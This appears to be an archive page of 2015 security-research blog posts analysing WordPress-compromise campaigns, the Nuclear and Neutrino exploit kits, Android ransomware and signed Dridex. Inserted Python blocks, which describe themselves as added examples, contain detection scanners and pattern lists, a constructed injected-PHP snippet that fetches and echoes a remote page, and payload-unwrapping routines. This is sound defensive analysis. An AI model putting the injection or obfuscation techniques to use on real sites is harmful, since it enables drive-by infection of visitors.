Friday, September 25, 2015

Compromised WordPress Campaign - Spyware Edition


The Zscaler security research team started investigating multiple WordPress-related security events earlier this month and came across a new widespread compromised WordPress campaign leading to the download of unwanted applications. This has been briefly covered by dynamoo and has been reported by some users on the official WordPress forums.

During our research, we discovered that this campaign started in the first week of August 2015 and has been fairly active since then, resulting in over 20,000 security events to date from over 2,000 web pages. The majority of the WordPress sites affected by this campaign are running the latest version, 4.3.1, but the compromise could have occurred prior to the update.

Figure 1: August 2015 WordPress Campaign hits

Figure 2: September 2015 WordPress Campaign hits

Infection Cycle

The infection starts when a user visits a compromised WordPress site. The compromised pages will have injected JavaScript shown below:

Figure 3: Injected malicious JavaScript code

The deobfuscated JavaScript code contains an iframe to the malicious server location:

Figure 4: Deobfuscated JavaScript containing the iframe

Although the target domains varied across the transactions that we saw, the associated server IP address has remained the same.

Target domains seen

The IP address associated with these domains is hosted in Latvia through a VPS hosting provider.

The injected iframe loads additional JavaScript that gathers information such as current system timestamp, timezone, and presence of Adobe Flash Player.

Figure 5: User system information gathering script

Figure 6: Function to check the presence of Flash Plugin and version information

The collected information is relayed back to the same server via an HTTP GET request. This is followed by a series of redirects leading to the download of spyware or potentially unwanted applications (PUA) masquerading as legitimate applications.

Figure 7: Redirects from Latvia VPS server leading to PUA download

Fake Flash Player - Win32.InstallCore

In one of the cases, we observed that the user is prompted to update the Flash Player as seen below:

Figure 8: Out of date Flash Player warning
The page prompts the user to update or install a new Flash Player update. Regardless of the option the user selects, a fake Adobe Flash Player application is downloaded.

FileName : Adobe Flash Player.exe
MD5 : fa75abf137224fc2c60b9b3c35c80a5e

This file is a .NET compiled executable which downloads and executes another setup file named FlashSetup.exe.

FileName : Flash Setup.exe
MD5: 87234af45b30740309c8bffcdf2167dc

Figure 9: Fake Flash Player download
The downloaded file flashsetup.exe is a variant of the potentially unwanted application Win32.InstallCore. During the installation of the fake Adobe Flash Player, several other websites offering other unwanted scareware applications are displayed. One such case, where the spyware installer prompts the user to download and install a Windows 7 PC Repair tool, is shown below:
Figure 8: Scareware Windows 7 Repair utility

Figure 9: Download from third party sites & adware traffic from PUA

Once the spyware installation is complete, the user is redirected to the legitimate Adobe page, which indicates that the installation was not successful and prompts the user to start over. If the user chooses to start the installation over, Adobe Flash Player will be installed from the genuine Adobe site.

Figure 10: User redirected to legitimate Adobe Flash Player

Fake MediaDownloader update - Win32.DownloadAssistant

In another case, the webpage prompts the user with a fake MediaDownloader software update which is a variant of PUA Win32.DownloadAssistant.

FileName: Setup.exe
MD5: a885f33c308721831498a2ac581bd91c
Figure 11: Fake MediaDownloader Update

The end result is the same: a potentially unwanted application is downloaded and installed on the victim machine. These applications have the capability to download additional malicious or unwanted applications.

We also saw instances of fake web browser plugins being downloaded and installed. Below is an example of a Google Chrome Plugin - NewTabTV plus.

Figure 12: Fake Google Chrome Plugin download

The compromised sites involved in this campaign are distributed worldwide and not limited to one particular region.

Figure 13: Geo distribution of the compromised WordPress sites - September 2015


WordPress, being one of the most popular content management systems and blogging platforms, remains an attractive target for cybercriminals. Unlike previous campaigns involving malware authors and exploit kit operators, the end payload served in this campaign consists of spyware and potentially unwanted applications. These applications may seem innocuous but can facilitate malvertising-based attacks through unsolicited advertisements.

Zscaler ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.

Analysis by Jithin Nair and Sameer Patil

Wednesday, September 23, 2015

An Update on Nuclear (Reverse) Engineering


Although Angler continues to be the leading exploit kit, Nuclear is a significant threat to web surfers and seems to have been very active lately. ThreatLabZ recently encountered a Nuclear campaign originating from a variety of compromised sites. These compromises continue the trend of WordPress sites serving malcode, and in this case included the web-presence of a UK-based healthcare organization.

Example of recent Nuclear landing page to exploit cycle

The execution flow of this campaign is typical: an infected site includes an embedded iframe that loads the exploit kit landing page. The landing page checks the browser family and version and tests the available Flash version before choosing one of several exploit payloads. From here, multiple possible payloads may be downloaded, in particular the Fareit infostealer Trojan and the Troldesh ransomware Trojan.

Nuclear Landing

As covered recently, WordPress continues to be one of the most effective traffic sources for exploit kits. However, the majority of traffic we have seen does not feature the visitorTracker component, but merely includes a hidden iframe in the footer of the WordPress page.

The malicious iframe is preceded by a large number of blank lines

The iframe loads the landing page, which features obfuscated JavaScript and random-looking text blocks. It turns out that some of the random looking text blocks are actually obfuscated components that the JavaScript eventually deobfuscates and executes.

Lines 7 and 9 are overlaid with the script invocations that decode the HTML blocks

Nuclear Exploit Payloads

The landing pages we evaluated led to two possible Flash exploits as well as one Internet Explorer exploit. Specifically, we saw CVE-2015-5122 and CVE-2015-5560 exploits for Flash, and a highly obfuscated CVE-2014-6332 exploit for IE.

The first Flash payload stage checks Flash Player version and prepares the appropriate exploit

As noted by Kafeine, Nuclear has integrated the same Diffie-Hellman key exchange that Angler first pioneered, only now it is implemented in Flash to protect the CVE-2015-5560 payload. This campaign also features an XTEA function with modified constants.

A Diffie-Hellman key exchange implementation is used to protect the new Flash payload
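To make the two techniques in the paragraph above concrete for an analyst, here is an added illustration in Python. It is not code from this post or from the exploit kit: it pairs a Diffie-Hellman exchange (so the key that protects the payload is derived per session rather than stored in the file) with an XTEA whose delta constant can be changed, and a naive signature check that shows why a non-standard constant defeats a detection that hunts for the published value. The DH group (2**127 - 1 with generator 2), the private exponents and the payload bytes are demonstration values chosen for this example, not parameters from the campaign.

```python
import hashlib
import struct

# Demonstration Diffie-Hellman group: 2**127 - 1 is a Mersenne prime and 2 serves as
# generator for illustration. Example parameters only, not a secure production group.
DH_P = (1 << 127) - 1
DH_G = 2

STANDARD_DELTA = 0x9E3779B9   # the delta from the published XTEA specification
MASK32 = 0xFFFFFFFF


def dh_public(private: int) -> int:
    """Public value g^a mod p for the private exponent a."""
    return pow(DH_G, private, DH_P)


def dh_shared_key(private: int, peer_public: int) -> bytes:
    """Shared secret (peer_public^a mod p), hashed down to a 128-bit XTEA key."""
    shared = pow(peer_public, private, DH_P)
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()[:16]


def _key_words(key: bytes):
    return struct.unpack("<4I", key)          # XTEA uses four 32-bit key words


def xtea_encrypt_block(v0, v1, key, delta=STANDARD_DELTA, rounds=32):
    k = _key_words(key)
    s = 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
        s = (s + delta) & MASK32
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
    return v0, v1


def xtea_decrypt_block(v0, v1, key, delta=STANDARD_DELTA, rounds=32):
    k = _key_words(key)
    s = (delta * rounds) & MASK32
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
        s = (s - delta) & MASK32
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
    return v0, v1


def xtea_encrypt(data: bytes, key: bytes, delta=STANDARD_DELTA) -> bytes:
    """ECB over 64-bit blocks with PKCS#7-style padding (ECB only to keep the demo short)."""
    pad = 8 - len(data) % 8
    data = data + bytes([pad]) * pad
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack("<2I", data[i:i + 8])
        out += struct.pack("<2I", *xtea_encrypt_block(v0, v1, key, delta))
    return bytes(out)


def xtea_decrypt(data: bytes, key: bytes, delta=STANDARD_DELTA) -> bytes:
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack("<2I", data[i:i + 8])
        out += struct.pack("<2I", *xtea_decrypt_block(v0, v1, key, delta))
    pad = out[-1]
    if not 1 <= pad <= 8:
        raise ValueError("bad padding: wrong key or wrong delta")
    return bytes(out[:-pad])


def contains_xtea_delta(code: bytes, delta=STANDARD_DELTA) -> bool:
    """Naive signature check: does the 32-bit constant appear literally (LE or BE) in the bytes?"""
    return struct.pack("<I", delta) in code or struct.pack(">I", delta) in code


def protected_payload_roundtrip(private_a: int, private_b: int, payload: bytes, delta=STANDARD_DELTA):
    """Both sides derive the same key from the exchange; no static key ships with the payload."""
    key_a = dh_shared_key(private_a, dh_public(private_b))
    key_b = dh_shared_key(private_b, dh_public(private_a))
    ciphertext = xtea_encrypt(payload, key_a, delta)
    return key_a == key_b, ciphertext, xtea_decrypt(ciphertext, key_b, delta)
```

The point for detection is the last function together with `contains_xtea_delta`: with the delta changed, the cipher still round-trips for anyone holding the negotiated key, but a rule that looks for the bytes of 0x9E3779B9 no longer fires, and because the key comes out of the exchange rather than the file, a static extraction of the payload needs the session's private value or a hook at decryption time.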

Besides making reverse engineers' lives harder, the authors have also decided to include some friendly shoutouts to those analyzing their code. In the case of the featured Flash payloads, the string "fuckAV" is used as a special constant.

This function returns an XOR key when "fuckAV" is supplied as a parameter

Nuclear Fallout

Once the browser is exploited, Nuclear first drops a Fareit payload. Fareit is an infostealer and, as can be seen in the strings below, looks to steal user credentials for multiple applications and websites as well as Bitcoin wallet information.

A sample of the files and paths Fareit checks for user credentials

While stealing users' information, Fareit attempts to hide its command and control communication by sending its check-in request in the midst of a batch of HTTP requests to innocuous-looking websites.

After checking connectivity on, multiple POSTs are performed

In addition to the Fareit payload, a Troldesh ransomware payload was also seen. Troldesh is yet another in the line of ransomware families that encrypt user files and attempt to extract ransom payments in exchange for decryption keys. This campaign is using the email addresses files100005(at) and files100006(at) and the Tor address a4yhexpmth2ldj3v.onion.

Troldesh bundles a Tor proxy to protect its communication

Although they might prefer to infect the machines of non-analysts, the Troldesh author does take the opportunity to greet their reverse engineer friends. This message is less aggressive than the greeting in the Nuclear Flash payload.

Thanks, but I don't drink coffee!


While Nuclear may not be the exploit kit that regularly debuts the latest advances, the authors certainly make an effort to keep up with new exploits and new obfuscation techniques. ThreatLabZ will continue to monitor Nuclear (and Fareit and Troldesh) for any new developments or greetings.



Thursday, September 3, 2015

More Adult Themed Android Ransomware

During the course of our daily malware hunt, we came across a new mobile ransomware variant that leverages pornography to lure victims into downloading and installing it. We'd previously blogged about similar Android malware.

App Name: Adult Player
MD5: 6ed2451d1300ff75e793744bb3563638
Package Name: content.mercenary.chiffon

This ransomware acts as a porn app named "Adult Player" and lures victims who assume it is a pornographic video player. When the victim starts using it, the app silently takes a photo of the victim, which is then displayed on the ransomware screen, along with the ransom message. The app demands a ransom of 500 USD.

Admin Activation:
Upon opening the app, it asks for admin rights as shown below:
Admin privilege
After clicking "Activate", the app shows a fake update page but nothing really happens in terms of an update.

Fake update page

The malware then loads another APK named test.apk from its local storage using a technique referred to as a reflection attack - /data/data/content.mercenary.chiffon/app_dex/test.apk.

Reflection is the ability of a program to examine and modify the behavior of an object at run time, instead of compile time.

APK stored in app's local storage
The specific reason for using reflection remains unknown but one reason could be to evade static analysis and detection.

Loading Test.apk

Personalized Ransom Screen:
The ransomware checks whether a front camera is available. If so, it takes a photo of the victim while he or she is using the app and displays the image on the ransom page.

Camera check
The majority of the malicious activities are then conducted by the newly loaded test.apk. The malware connects to the following hard-coded domains contained in the app:
  • hxxp://directavsecurity[.]com
  • hxxp://avsecurityorbit[.]com
  • hxxp://protectforavno[.]net
  • hxxp://trustedsecurityav[.]net
Hard-coded Domains
The malware then sends the following details, including the victim's mobile device and operating system information, to the remote server:
Data sent in requests

Ultimately, the malware receives a custom ransom page at run time in a multi-encoded response from the aforementioned servers.

Decoded Ransom Message
Once the response is received, the ransomware locks the phone and displays the following ransom screen.
Ransom Page 1 (User Image Displayed Here)

Ransom Page 2

The ransom screen is designed to stay persistent even across reboots. It does not allow the user to operate the device and keeps the screen active with the ransom message.

Broadcast Receiver acting on particular events

Preventing device from sleeping
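The traits described above (a device-admin receiver, a boot-time broadcast receiver, camera access, a wake lock, and a second APK loaded from app_dex via reflection) are exactly what a static triage pass looks for. The following Python script is an added example, not tooling from this post: it reads an AndroidManifest.xml and a strings dump and flags those indicators. The manifest and the strings dump are constructed for the example; the package name and the app_dex path are the ones reported above, while the receiver class names (.AdminReceiver, .BootReceiver) and the one-point-per-indicator scoring are this example's own choices.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest modelled on the behaviours described above (device-admin receiver,
# boot persistence, camera, wake lock). Package name as reported in the post; class names invented.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="content.mercenary.chiffon">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <application android:label="Adult Player">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed stand-in for a `strings` dump of classes.dex.
SAMPLE_STRINGS = """
Ldalvik/system/DexClassLoader;
/data/data/content.mercenary.chiffon/app_dex/test.apk
Ljava/lang/reflect/Method;
loadClass
invoke
"""

DYNAMIC_LOAD_MARKERS = (
    "dalvik/system/DexClassLoader",
    "dalvik/system/PathClassLoader",
    "app_dex/",
    "java/lang/reflect/Method",
)


def triage_manifest(manifest_xml: str) -> dict:
    """Pull the permission and receiver facts that matter for a lock-screen ransomware."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    actions = set()
    device_admin = False
    for rcv in root.iter("receiver"):
        if rcv.get(ANDROID_NS + "permission") == "android.permission.BIND_DEVICE_ADMIN":
            device_admin = True
        for act in rcv.iter("action"):
            actions.add(act.get(ANDROID_NS + "name"))
    return {
        "package": root.get("package"),
        "device_admin_receiver": device_admin or "android.app.action.DEVICE_ADMIN_ENABLED" in actions,
        "boot_persistence": "android.intent.action.BOOT_COMPLETED" in actions,
        "camera": "android.permission.CAMERA" in perms,
        "wake_lock": "android.permission.WAKE_LOCK" in perms,
    }


def triage_strings(strings_dump: str) -> dict:
    """Look for dynamic code loading and secondary APKs kept in the app's private storage."""
    hits = [m for m in DYNAMIC_LOAD_MARKERS if m in strings_dump]
    apk_paths = re.findall(r"/data/data/[\w.]+/[\w./-]+\.apk", strings_dump)
    return {"dynamic_code_loading": bool(hits), "markers": hits, "embedded_apk_paths": apk_paths}


def risk_score(manifest_xml: str, strings_dump: str) -> int:
    """One point per indicator (the weighting is this example's choice, not a published scheme)."""
    m = triage_manifest(manifest_xml)
    s = triage_strings(strings_dump)
    indicators = [m["device_admin_receiver"], m["boot_persistence"],
                  m["camera"], m["wake_lock"], s["dynamic_code_loading"]]
    return sum(1 for hit in indicators if hit)
```

No single indicator is damning on its own (a legitimate MDM agent also asks for device admin), which is why the score combines them; an app that asks for device admin, restarts at boot, wants the camera and loads a DEX from its own data directory is worth a manual look.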

More variants:
We also encountered additional apps belonging to this ransomware family and exhibiting similar functionality.

Sample MD5s:

  • ecd8c9eeae86c0d7d3c433e887fd5d3a
  • b544785176ed8152671bac94a18ca9d0
  • 9c731690985ce7c13ca9b25b9139d6a3

The ransomware is designed to stay fixed on screen and does not allow the victim to uninstall it. Rebooting the device does not help in such cases, as the ransomware app becomes active immediately after the reboot, which leaves the victim no opportunity to get into the device "settings" and uninstall the ransomware.

In such scenarios, it can be removed by using the following steps:

  1. Boot device into safe mode (Please note that entering "safe mode" varies depending on your device). Safe mode boots the device with default settings without running third party apps.
  2. Uninstalling the ransomware from the device requires you to first remove its administrator privilege. To do so, go to Settings --> Security --> Device Administrator, select the ransomware app, then deactivate it.
  3. Once this is done, you can go to Settings --> Apps --> Uninstall ransomware app.

To avoid becoming a victim of such ransomware, it is always best to download apps only from trusted app stores, such as Google Play. This can be enforced by unchecking the "Unknown Sources" option under the "Security" settings of your device.

Monday, August 24, 2015

Signed Dridex Campaign


Malware authors use various means to make their malware look similar to legitimate software. One such approach involves signing a malware sample with a digital certificate. Recently we saw Dridex malware authors using this technique while reviewing the samples in our Cloud Sandbox. Dridex is a banking Trojan which typically arrives on a system via malicious spam email with a Microsoft Office file as an attachment. These files have embedded macros that lead to the download and installation of the Dridex Trojan. Dridex then attempts to steal the victim's banking credentials and system information.

Signed Dridex campaign

Here we came across one malicious attachment with an encrypted macro that downloads signed Dridex samples from[.]php. This Dridex sample is packed using a custom packer, which is compiled with .NET. The current Dridex is signed with a certificate that is issued to Private Person Parobii Yuri Romanovich. This certificate has been specially created for spreading the Dridex malware.

We also saw the following signer information in the certificates used for signing the Dridex executables:
  • AVTOZVIT Scientific Production Private Company
  • Private Person Parobii Yuri Romanovich
The certificates were all issued by COMODO and we observed the following URLs serving the signed Dridex malware:
  • [.] php
  • [.] php
  • [.] php
  • [.] php
  • [.] php
  • [.] php
  • [.] php
Below are the Dridex samples served from the aforementioned URLs. All of the samples are packed with the same .NET packer mentioned above:
  • 5CA1DBA1C72AC999E221DE98BBC584C4
  • 9E73E0C4B92253C5F8B6648F29B28B5B
  • CD243B30B9BBD682C082CFEFDBF79ACD
  • E578618F2D38FC251D52D1366144404F
  • 5F907702CE229937955B4DCE92EC4575
  • 0BBC8CD08E9958ACDE0519A2B2840CD7
  • 9D1D0632329F04D8B1EC21AFF4CE6493
  • 32230D747829DCF77841F594AA54915A
  • 8F1A9A9830FF02C5C2BA4C17DFE8B09D
  • 00DCA835BB93708797A053A3B540DB16
  • 393E2145F4C3E9B5697A2AAEB25AA8D3
  • 1992170FDC642D4A99A7BC82BA82FA31
  • 9261B8EAF1DA3D9CFF522875A7198667
  • FB67C85F3F42D3E48B9E7B7637D30858
  • E578618F2D38FC251D52D1366144404F
Dridex Packer:
The Dridex sample is embedded in the resource section of the packer. After unpacking, it drops a Borland Delphi executable file. The following is a snapshot of the encrypted resource section:

Encrypted Resource Section
Dridex Activity:
The current Dridex sample tries to connect to different IPs included in the config file. The config file for the sample is embedded in the sample itself. In the config file we observed a botnet ID and a list of C&C servers. Below is a snapshot of the config file:

Configuration file
Dridex collects and sends the following system information to one of the C&C servers listed in the config file:
  • Computer Name
  • User Name
  • Windows Version
  • Botnet ID
Information sent to the server
Below is the complete list of C&C servers it tries to connect to.


The use of a legitimate certificate to sign malware executables in order to evade security detection is not new but is still very effective. The malware author aims to exploit code-signing-certificate-based whitelisting by signing their samples. Zscaler ThreatLabZ is actively monitoring these signed malware campaigns and ensuring coverage for our customers.

Analysis by Tarun Dewan and Nirmal Singh

Thursday, August 20, 2015

Neutrino Campaign Leveraging WordPress, Flash for CryptoWall


Neutrino Exploit Kit (EK) appeared on the scene around March of 2013 and continues to remain active and incorporate new exploits. In the beginning of July, Neutrino reportedly incorporated the HackingTeam 0day (CVE-2015-5119), and in the past few days we've seen a massive uptick in the use of the kit. The cause of this uptick appears to be widespread WordPress site compromises.

ThreatLabZ started seeing a new campaign where WordPress sites running version 4.2 and lower were compromised, and the image below illustrates the components involved in this campaign.

Fig 1. Complete Neutrino WordPress campaign

In analyzing the infection cycle, there are multiple recent changes in the Neutrino code, some that are normally characteristics of Angler Exploit Kit, but others that remain unique to Neutrino.

WordPress Compromises

Similar to Angler Exploit Kit, the new wave of Neutrino is targeting outdated versions of WordPress. In fact, we have seen over 2600 unique WordPress sites being used in this campaign where more than 4200 distinct pages have been logged with dynamic iframe injection in the last month. As mentioned, all the targeted websites were running WordPress version 4.2 and lower.

Fig 2. Event timeline overview

The goal of this campaign is to completely compromise the site, which includes adding a webshell, harvesting credentials, and finally injecting an iframe that loads a Neutrino landing page. The iframe is injected into the compromised site immediately after the BODY tag, and is almost identical to recent Angler samples. Compare the recent Neutrino and Angler samples below.

Fig 3. Neutrino on the left, Angler on the right

The code specifically targets Internet Explorer, so those using other browsers won't be served the iframe, and a cookie is used to prevent serving the iframe multiple times to the same victim.

The actual Neutrino landing pages are retrieved on the backend through the injected PHP code, a sample of which is below:

Fig 4. Injected PHP code

Note the base64 encoded value boxed in red above; this decodes to the URL below, where X, Y, and Z are integers:
This URL is used to retrieve an updated landing page URL, and we've noted that the URLs change very frequently. Additionally, the primary IP hosting the majority of landing page domains is '' which is owned by We reached out to them via email briefly explaining what we were seeing and received no response.
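The three campaigns on this page inject in recognisably similar ways: the spyware campaign's obfuscated script with an iframe, Nuclear's hidden footer iframe behind a long run of blank lines, and Neutrino's iframe directly after the BODY tag fed by PHP that unwraps a base64-encoded backend URL. The Python scanner below is an added example, not tooling from these posts or from Zscaler, that checks a page and a PHP fragment for those patterns. The sample HTML and PHP are constructed for the example (the hostnames use the reserved .invalid TLD), and the thresholds, such as the 20-blank-line run, are this example's own choices.

```python
import base64
import re

# Constructed sample page: hidden iframe right after <body>, an obfuscated inline script,
# and a footer iframe hidden behind a run of blank lines. Not a real capture.
SAMPLE_HTML = "\n".join([
    "<html><head><title>Blog</title></head>",
    '<body class="home">',
    '<iframe src="http://landing.example.invalid/x" width="1" height="1" style="display:none"></iframe>',
    "<p>Welcome to the blog</p>",
    '<script>eval(unescape("%76%61%72%20%61%3d%31"));</script>',
    "</body>",
    "<!-- footer -->",
] + [""] * 40 + [
    '<iframe src="http://ek.example.invalid/" style="visibility:hidden"></iframe>',
    "</html>",
])

# Constructed PHP fragment: the backend URL is wrapped in base64 and fetched server-side.
B64_URL = base64.b64encode(b"http://backend.example.invalid/get.php?v=1").decode()
SAMPLE_PHP = (
    "<?php\n"
    f'$u = base64_decode("{B64_URL}");\n'
    "$page = @file_get_contents($u . '?r=' . urlencode($_SERVER['HTTP_REFERER']));\n"
    "echo $page;\n"
)

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*[\"']?\s*[01]\b", re.I)
OBFUSCATED_JS = re.compile(r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|\batob\s*\(", re.I)
B64_ARG = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]{16,})[\"']\s*\)")


def scan_html(html: str):
    """Return (indicator, evidence) pairs for injected-iframe and obfuscated-script patterns."""
    findings = []
    m = re.search(r"<body\b[^>]*>\s*(<iframe\b[^>]*>)", html, re.I)
    if m:
        findings.append(("iframe_immediately_after_body", m.group(1)))
    for m in IFRAME.finditer(html):
        if HIDDEN.search(m.group(0)):
            findings.append(("hidden_iframe", m.group(0)))
    # An iframe pushed off-screen in the editor by 20 or more blank lines (threshold is ours).
    for m in re.finditer(r"(?:[ \t]*\r?\n){20,}[ \t]*(<iframe\b[^>]*>)", html, re.I):
        findings.append(("iframe_after_blank_run", m.group(1)))
    for m in re.finditer(r"<script\b[^>]*>(.*?)</script>", html, re.I | re.S):
        if OBFUSCATED_JS.search(m.group(1)):
            findings.append(("obfuscated_inline_script", m.group(1).strip()[:60]))
    return findings


def scan_php(php: str) -> dict:
    """Decode base64 literals handed to base64_decode() and flag server-side remote fetches."""
    decoded = []
    for m in B64_ARG.finditer(php):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    remote_fetch = bool(re.search(r"\b(?:file_get_contents|curl_exec|fsockopen)\s*\(", php))
    suspicious = remote_fetch and any(d.startswith(("http://", "https://")) for d in decoded)
    return {"decoded_literals": decoded, "remote_fetch": remote_fetch, "suspicious": suspicious}
```

Run over a theme's footer.php, header.php and the rendered front page, these checks catch the three injection styles described here; the decoded literal from `scan_php` is the backend address worth blocking at the egress proxy, since the landing-page URLs it hands out rotate far more often than the backend itself.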

Neutrino Landing Page

The landing page has been updated and contains some JavaScript that only declares variables, and then a flash loader:

Fig 5. Neutrino landing page

If Flash isn't installed on the victim machine, an old Flash CAB file is pushed to the user prior to serving the malicious SWF. Note the departure from using base64 encoded data blobs, or really from using very much code at all on the landing page.

Neutrino SWF

Past versions of the Neutrino SWF contained multiple exploit payloads encrypted via RC4. Examining this SWF shows that things have apparently changed as the structure is very different:

Fig 6. SWF structure

Taking a look at the code shows that instead of RC4, there is a decode function that uses the input of one binary data blob to decode a second binary blob; the decoded data reveals a second SWF:

Fig 7. Decode function for embedded SWF

Detection results for the SWF are very poor with only one vendor detecting it:

Fig 8. Poor detection results on SWF

Carving out the embedded SWF and analyzing it shows a much more familiar structure for Neutrino, with some additional enhancements. Notably similar is the use of multiple embedded binary blobs that are RC4 encrypted:

Fig 9. Binary data inside embedded SWF

Fig 10. Script data inside embedded SWF - characteristic of Neutrino

These binary blobs contain multiple payloads, and this has been analyzed and documented in the past, notably by Kafeine and Dennis O'Brien on Malwageddon. However, unlike past Neutrino SWFs, the RC4 keys are no longer in cleartext and decoding them requires tracing through multiple function calls. The ActionScript structure is still very recognizable though:

Fig 11. Decoder for one binarydata 'exploitWrapper' blob
Detection on the embedded SWF is also quite poor.
Fig 12. Embedded SWF VT detection
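The two-stage SWF layout described above (one binary blob decoding another, the decoded data holding a second SWF, and that inner SWF carrying RC4-encrypted blobs) lends itself to a small unwrapping routine. The Python below is an added example, not code from this post or from the kit: it XOR-decodes an outer blob with a key blob, carves the inner SWF by its header (magic, version byte, uint32 LE length), and RC4-decrypts the inner body. The sample container is constructed here with a valid SWF header and a marker string as its "payload"; the key blob, RC4 key and the assumption that the whole inner body is one RC4 blob are this example's choices, since the real kit's blob layout is not reproduced on the page.

```python
import struct

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")   # uncompressed, zlib-compressed, LZMA-compressed


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling plus keystream); used here only to unwrap blobs."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_with_blob(data: bytes, keyblob: bytes) -> bytes:
    """Outer stage: one BinaryData blob used as a repeating XOR key for the other."""
    return bytes(b ^ keyblob[i % len(keyblob)] for i, b in enumerate(data))


def carve_swf(buf: bytes):
    """Locate SWF headers: 3-byte magic, version byte, uint32 LE uncompressed length."""
    hits = []
    for magic in SWF_MAGICS:
        start = 0
        while (idx := buf.find(magic, start)) != -1:
            if idx + 8 <= len(buf):
                version = buf[idx + 3]
                length = struct.unpack_from("<I", buf, idx + 4)[0]
                # For FWS the length must fit in the buffer; compressed variants record the
                # uncompressed size, so only the version range is sanity-checked for them.
                fits = (idx + length <= len(buf)) if magic == b"FWS" else True
                if 1 <= version <= 64 and length >= 8 and fits:
                    hits.append({"offset": idx, "magic": magic.decode(),
                                 "version": version, "length": length})
            start = idx + 1
    return sorted(hits, key=lambda h: h["offset"])


def build_fake_swf(version: int, body: bytes) -> bytes:
    """Constructed container with a valid header and an opaque body (not a playable SWF)."""
    return b"FWS" + bytes([version]) + struct.pack("<I", 8 + len(body)) + body


def unwrap_stages(outer: bytes, keyblob: bytes, rc4_key: bytes):
    """Stage 1: XOR-decode and carve the inner SWF. Stage 2: RC4-decrypt its body,
    which in this constructed layout is a single blob following the 8-byte header."""
    decoded = xor_with_blob(outer, keyblob)
    hits = carve_swf(decoded)
    if not hits:
        return None
    h = hits[0]
    inner = decoded[h["offset"]:h["offset"] + h["length"]]
    return rc4(rc4_key, inner[8:])


# Constructed sample: the "payload" is a marker string, never real exploit code.
KEYBLOB = bytes(range(1, 61))
RC4_KEY = b"demo-key"
INNER_SWF = build_fake_swf(11, rc4(RC4_KEY, b"CONSTRUCTED-INNER-PAYLOAD"))
STAGE1_PLAIN = b"\x00" * 5 + INNER_SWF + b"\xff" * 3
OUTER = xor_with_blob(STAGE1_PLAIN, KEYBLOB)
```

The reason detection on the outer SWF is so poor follows directly from this layout: nothing in the outer file looks like a SWF or like RC4 output with a known key, and `carve_swf` finds the inner header only after the XOR stage has run. In a real sample the key blob and RC4 keys come from tracing the ActionScript, as the post notes; the carving and decryption steps are what stay constant.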


Successful exploitation of a victim leads to an encrypted executable download. The binary is decrypted and begins beaconing almost immediately:

Fig 13. Initial beacon summary
Fig 14. Full beacon/response sample

Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple minutes later we see the all too familiar 'HELP_DECRYPT' page and see connections out to the payment servers:

Fig 15. Payment server connections

Fig 16. CryptoWall 3.0 HELP_DECRYPT page

To read more about CryptoWall, please see our previous writeup here.

Campaign Information

As stated, the primary IP for the observed Neutrino landing pages is '' which is owned by Many of the domains pointing to that IP utilize 'xyz', 'ga', 'gq', and 'ml' TLDs. Taking a look at the whois data for some of these domains, a common attribute seems to be the name 'Max Vlapet' for .XYZ domains. Full whois domain sample for completeness:


Domain Name: MOHGROUP.XYZ 
Domain ID: D9543161-CNIC 
WHOIS Server: 
Referral URL: 
Updated Date: 2015-08-18T08:34:04.0Z 
Creation Date: 2015-08-18T08:34:03.0Z 
Registry Expiry Date: 2016-08-18T23:59:59.0Z 
Sponsoring Registrar: AlpNames Limited 
Sponsoring Registrar IANA ID: 1857 
Domain Status: clientTransferProhibited 
Domain Status: serverTransferProhibited 
Domain Status: addPeriod 
Registrant ID: ALP_44867689 
Registrant Name: Max Vlapet 
Registrant Organization: N/A 
Registrant Street: Mausoleum str, pl.13 
Registrant City: Moscow 
Registrant State/Province: Moscow 
Registrant Postal Code: 123006 
Registrant Country: RU 
Registrant Phone: +7.4959826524 
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: 
Admin ID: ALP_44867689 
